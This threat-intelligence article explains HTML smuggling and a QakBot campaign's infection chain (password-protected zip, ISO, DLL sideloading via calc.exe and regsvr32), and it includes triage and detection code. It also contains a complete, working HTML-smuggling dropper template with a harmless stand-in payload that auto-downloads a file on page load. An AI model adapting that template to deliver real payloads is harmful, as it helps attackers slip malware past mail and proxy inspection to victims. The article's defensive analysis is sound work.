HTML smuggling is a stealthy technique used to deliver malicious payloads. For well over a decade, threat actors relied on macros in Microsoft Office documents as their primary infection vector. With Microsoft now blocking VBA macros by default in Office files obtained from the internet, threat actors have had to find other ways to lure victims and deliver payloads: malware families such as Emotet, IcedID, and QakBot have already moved to LNK, ISO, and IMG files and to techniques like HTML smuggling. These attacks are still evolving, but researchers have observed a many-fold increase in their adoption since January 2022. In particular, state-sponsored groups such as NOBELIUM (APT29), together with prominent malware families like Emotet and QakBot, are making extensive use of HTML smuggling against both individuals and organizations.
Generally, threat actors use HTML smuggling in one of two ways:
CYFIRMA has observed the HTML smuggling technique being used by threat actors such as NOBELIUM and in campaigns delivering malware such as Mekotio, AsyncRAT, Trickbot and, most recently, QakBot. These families are used to gain control of victim machines, stage further payloads, and ultimately carry out ransomware attacks.
Anchor Tag <a>: The anchor tag <a> defines a hyperlink in HTML and is used to link from one page to another resource, such as a script, another HTML page, or a downloadable file.
The most important attribute of the <a> element is href, which indicates the link’s destination.
When <a> carries the download attribute, the browser saves the linked resource as a file instead of navigating to it; the attribute’s value, if present, becomes the suggested file name on disk.
As shown above, when the user clicks the link (“Click_Here” in our case), the download attribute makes the browser save the file referenced by href rather than open it. The code instructs the browser to fetch “malicious_document.docx” from the specified location and store it on the victim’s machine as “trusted_document.docx”. Note that modern browsers only honour the file name given in the download attribute for same-origin, blob: and data: URLs, which is one reason smuggling pages assemble the file inside the browser as a Blob instead of linking to a remote host.
If the payload is large, the Blob’s slice() method can be used to divide it into smaller pieces that are then supplied as input one at a time.
This triggers the anchor’s click event, which in turn causes the browser to save our Blob as “maliciousfilename.doc”. These features are supported by all modern browsers; for older versions of Internet Explorer, the msSaveBlob method can be used to save a Blob object to disk.
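The sequence described above, written out as an added example: this is illustrative code, not the page’s own snippet or any sample CYFIRMA analysed. The base64 string is a constructed 13-byte text payload standing in for an attacker’s archive; the file name, MIME type and function names are chosen for the example. In a browser the last line drops the file; under Node.js 18 or later only the decode and Blob steps run, because there is no document.

```javascript
// Added illustrative example of the HTML-smuggling sequence; not the page's
// own code. Payload, file name and function names are constructed.

// Constructed stand-in for the attacker's payload: base64 of "Hello, World!".
// A real sample carries a zip or ISO of tens of kilobytes in the same place.
const SMUGGLED_B64 = "SGVsbG8sIFdvcmxkIQ==";
const DROP_NAME = "trusted_document.txt"; // name the victim sees in the download

// Step 1: base64 string -> raw bytes. Working in slices keeps the intermediate
// objects small for large payloads; this is the chunking the text refers to.
function decodeBase64ToBytes(b64, chunkSize = 1024) {
  const binary = atob(b64); // "binary string": one char per byte
  const bytes = new Uint8Array(binary.length);
  for (let offset = 0; offset < binary.length; offset += chunkSize) {
    const piece = binary.slice(offset, offset + chunkSize);
    for (let i = 0; i < piece.length; i++) {
      bytes[offset + i] = piece.charCodeAt(i);
    }
  }
  return bytes;
}

// Step 2: wrap the bytes in a Blob. The MIME type is whatever the attacker
// wants the browser to believe; nothing about the file comes from a server.
function buildPayloadBlob(bytes, mime = "application/octet-stream") {
  return new Blob([bytes], { type: mime });
}

// Step 3: the anchor trick. A blob: URL is same-origin, so the browser honours
// the download attribute's file name, and no request for the file is ever
// sent over the network. Returns the blob: URL used (browser), the string
// "msSaveBlob" (legacy IE), or null when there is no DOM (e.g. Node.js).
function triggerDownload(blob, filename) {
  if (typeof document === "undefined") return null;
  if (typeof navigator !== "undefined" && typeof navigator.msSaveBlob === "function") {
    navigator.msSaveBlob(blob, filename); // legacy Internet Explorer path
    return "msSaveBlob";
  }
  const url = URL.createObjectURL(blob);
  const a = document.createElement("a");
  a.href = url;
  a.download = filename; // name on disk, independent of anything server-side
  document.body.appendChild(a);
  a.click(); // programmatic click: the victim never has to click a link
  document.body.removeChild(a);
  URL.revokeObjectURL(url);
  return url;
}

// Runs on page load in a browser; a no-op under Node.js (returns null).
triggerDownload(buildPayloadBlob(decodeBase64ToBytes(SMUGGLED_B64)), DROP_NAME);
```

From a defender’s point of view the important property is in step 3: the only thing that crosses the network is the HTML page itself, so proxy and mail-gateway inspection of the downloaded file never happens; the archive exists only after the browser assembles it.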
The CYFIRMA research team continuously monitors new tactics and techniques used by threat actors, along with ongoing campaigns and the methodologies cyber-criminals follow to compromise organizations and individuals. In July 2022, our research team observed an operation consisting of a series of emails belonging to a QakBot malware campaign.
Below are snapshots of the code in the HTML file attached to the spam email:
As shown below, the HTML file holds the Base64-encoded malicious file in a variable named “text”. A series of obfuscated functions defined at the end of the snapshot implements the HTML smuggling technique, decoding that variable and finally writing the malicious zip archive to disk as “Report Jul 14 47787.zip”.
The zip file is password protected – the password is stored in the HTML file.
As shown below, when the victim opens the HTML file, the zip file is automatically downloaded to the user’s system via the HTML smuggling technique described above. The password needed to extract the zip is also displayed to the user. The zip contains an ISO file with the same base name but the extension .iso (i.e., Report Jul 14 47787.iso).
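To triage an attachment like the one above, an analyst wants the embedded literal, the name the file will be dropped as, and the displayed password, without ever opening the HTML in a browser. The following is an added example, not the page’s own code or CYFIRMA tooling: a Node.js (18+) script that does this with plain string scanning. The sample HTML is a constructed imitation of the structure described above (a variable text holding base64, an anchor download assignment, a visible password), and its payload is only a 39-byte stub that begins with a zip local-file-header signature. The marker list, the length threshold and the password regex are heuristics chosen for the example.

```javascript
// Added example, not CYFIRMA's tooling: static triage of a suspected
// HTML-smuggling attachment. Every input below is constructed.

// Constructed payload stub: a zip local-file-header signature (PK\x03\x04)
// followed by zero bytes, base64-encoded. Real samples carry the whole archive.
const STUB_ZIP_B64 = "UEsDBBQAAAAI" + "A".repeat(40);

// Constructed attachment mimicking the structure described in the text.
const SAMPLE_HTML = `<html><body>
<p>Your report is ready. Archive password: example123</p>
<script>
var text = "${STUB_ZIP_B64}";
var bin = atob(text);
var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
var blob = new Blob([bytes], { type: "application/zip" });
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "Report Jul 14 47787.zip";
a.click();
</script></body></html>`;

// Script fragments that, taken together, make up the smuggling pattern.
const SMUGGLING_MARKERS = ["atob(", "new Blob(", "createObjectURL", ".download", ".click()", "msSaveBlob"];

// Identify the container from its first bytes; only zip is needed here.
function identifyMagic(buf) {
  return buf.subarray(0, 4).toString("hex") === "504b0304" ? "zip" : "unknown";
}

// Every quoted literal that looks like base64 and is at least minLen chars long.
// The default is well above what a benign page embeds inline; the constructed
// sample is tiny, so the run at the bottom lowers it.
function extractBase64Literals(html, minLen = 256) {
  const re = new RegExp("([\"'])([A-Za-z0-9+/]{" + minLen + ",}={0,2})\\1", "g");
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[2]);
  return out;
}

function analyzeSmugglingHtml(html, minLen = 256) {
  const markers = SMUGGLING_MARKERS.filter((s) => html.includes(s));
  // Name set from script (a.download = "...") or as a static attribute.
  const nameMatch = html.match(/\.download\s*=\s*["']([^"']+)["']/) || html.match(/download=["']([^"']+)["']/);
  const pwMatch = html.match(/password[\s:]*([^\s<]+)/i); // heuristic
  const payloads = extractBase64Literals(html, minLen).map((lit) => {
    const buf = Buffer.from(lit, "base64");
    return {
      literalLength: lit.length,
      byteLength: buf.length,
      magicHex: buf.subarray(0, 4).toString("hex"),
      kind: identifyMagic(buf),
    };
  });
  return {
    markers,
    downloadName: nameMatch ? nameMatch[1] : null,
    password: pwMatch ? pwMatch[1] : null,
    payloads,
    suspicious: markers.length >= 3 && payloads.length > 0,
  };
}

// Example run; minLen lowered because the constructed payload is only 52 chars.
const REPORT = analyzeSmugglingHtml(SAMPLE_HTML, 32);
console.log(JSON.stringify(REPORT, null, 2));
```

Real samples usually split or lightly obfuscate the literal (string reversal, custom alphabets, concatenation), so a production version should also flag an unusually large script-to-markup ratio and feed any recovered bytes to a sandbox rather than trusting the magic-number check alone.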
Extracting the .iso file yields four files: a .lnk shortcut, a legitimate calc.exe, WindowsCodecs.dll, and 7533.dll.
The shortcut (.lnk) file points to calc.exe, as shown below.
When the victim clicks the shortcut, calc.exe runs and automatically loads the malicious WindowsCodecs.dll sitting next to it. This is DLL sideloading: the malware authors place a legitimate application (calc.exe) and a malicious DLL (WindowsCodecs.dll) together in the same folder. The malicious DLL carries the name of a library the legitimate application loads during execution, and because Windows searches the application’s own directory before the system directories for any DLL that is not already loaded or on the KnownDLLs list, the attacker’s copy is the one that gets loaded. Here calc.exe is a legitimate Microsoft binary and WindowsCodecs.dll is the malicious DLL masquerading as the genuine one; once loaded by calc.exe, it executes the final QakBot payload, 7533.dll, through the Windows living-off-the-land binary regsvr32.exe, as shown below.
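The sideloading chain above leaves a distinctive trace in process and image-load telemetry: calc.exe running from a user-writable or removable path, calc.exe loading WindowsCodecs.dll from somewhere other than the system directories, and calc.exe spawning regsvr32.exe. The following is an added detection example, not CYFIRMA’s tooling: a Node.js function that scans Sysmon-style event records for those three conditions and correlates them by process id. The event records, the D:\ path (standing in for the mounted ISO), pids and field names are constructed for the example and would need mapping onto your own telemetry schema.

```javascript
// Added detection example; not the page's own code. Event records are
// constructed to mirror the chain described in the text, with simplified
// Sysmon-like fields (ProcessCreate ~ event ID 1, ImageLoad ~ event ID 7).
const SAMPLE_EVENTS = [
  { type: "ProcessCreate", pid: 4120, ppid: 3980,
    image: "D:\\calc.exe", parentImage: "C:\\Windows\\explorer.exe",
    commandLine: "\"D:\\calc.exe\"" },
  { type: "ImageLoad", pid: 4120,
    image: "D:\\calc.exe", loaded: "D:\\WindowsCodecs.dll" },
  { type: "ProcessCreate", pid: 4188, ppid: 4120,
    image: "C:\\Windows\\System32\\regsvr32.exe", parentImage: "D:\\calc.exe",
    commandLine: "regsvr32.exe 7533.dll" },
  // Benign control: the genuine calc.exe loading the genuine DLL.
  { type: "ImageLoad", pid: 5210,
    image: "C:\\Windows\\System32\\calc.exe",
    loaded: "C:\\Windows\\System32\\WindowsCodecs.dll" },
];

const SYSTEM_DIRS = ["c:\\windows\\system32\\", "c:\\windows\\syswow64\\"];
// Signed Microsoft binaries abused as sideload hosts in this campaign; extend as needed.
const SIDELOAD_HOSTS = new Set(["calc.exe"]);
// DLLs those hosts resolve from their own directory ahead of System32.
const SIDELOAD_DLLS = new Set(["windowscodecs.dll"]);

const lower = (p) => (p || "").toLowerCase();
const basename = (p) => lower(p).split("\\").pop();
const inSystemDir = (p) => SYSTEM_DIRS.some((d) => lower(p).startsWith(d));

// One finding per matching event, each tagged with the pid of the suspicious
// host process (for the regsvr32 child that is its parent's pid) so the
// findings can be chained together afterwards.
function detectSideloadChain(events) {
  const findings = [];
  for (const ev of events) {
    if (ev.type === "ProcessCreate" && SIDELOAD_HOSTS.has(basename(ev.image)) && !inSystemDir(ev.image)) {
      findings.push({ pid: ev.pid, rule: "host_outside_system_dir", detail: ev.image });
    }
    if (ev.type === "ImageLoad" && SIDELOAD_DLLS.has(basename(ev.loaded)) && !inSystemDir(ev.loaded)) {
      findings.push({ pid: ev.pid, rule: "dll_loaded_outside_system_dir", detail: ev.loaded });
    }
    if (ev.type === "ProcessCreate" && basename(ev.image) === "regsvr32.exe" && SIDELOAD_HOSTS.has(basename(ev.parentImage))) {
      findings.push({ pid: ev.ppid, rule: "host_spawned_regsvr32", detail: ev.commandLine });
    }
  }
  return findings;
}

// A pid with two or more distinct rules firing is reported as a chain; a single
// rule on its own (e.g. calc.exe copied to a USB stick) is left as low-severity.
function correlateByPid(findings) {
  const byPid = new Map();
  for (const f of findings) {
    if (!byPid.has(f.pid)) byPid.set(f.pid, new Set());
    byPid.get(f.pid).add(f.rule);
  }
  return [...byPid]
    .filter(([, rules]) => rules.size >= 2)
    .map(([pid, rules]) => ({ pid, rules: [...rules] }));
}

const FINDINGS = detectSideloadChain(SAMPLE_EVENTS);
const CHAINS = correlateByPid(FINDINGS);
console.log(JSON.stringify({ findings: FINDINGS, chains: CHAINS }, null, 2));
```

The same three conditions translate directly into a SIEM correlation rule; the image-load condition is the highest-fidelity of the three, since the genuine WindowsCodecs.dll is only ever loaded from the system directories.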
| Tactic | Technique |
|---|---|
| Initial Access (TA0001), leading to Execution (TA0002) | T1204 User Execution |
| Execution (TA0002) | T1204.002 User Execution: Malicious File |
| Execution (TA0002) | T1059.007 Command and Scripting Interpreter: JavaScript |
| Defense Evasion (TA0005) | T1027.006 Obfuscated Files or Information: HTML Smuggling |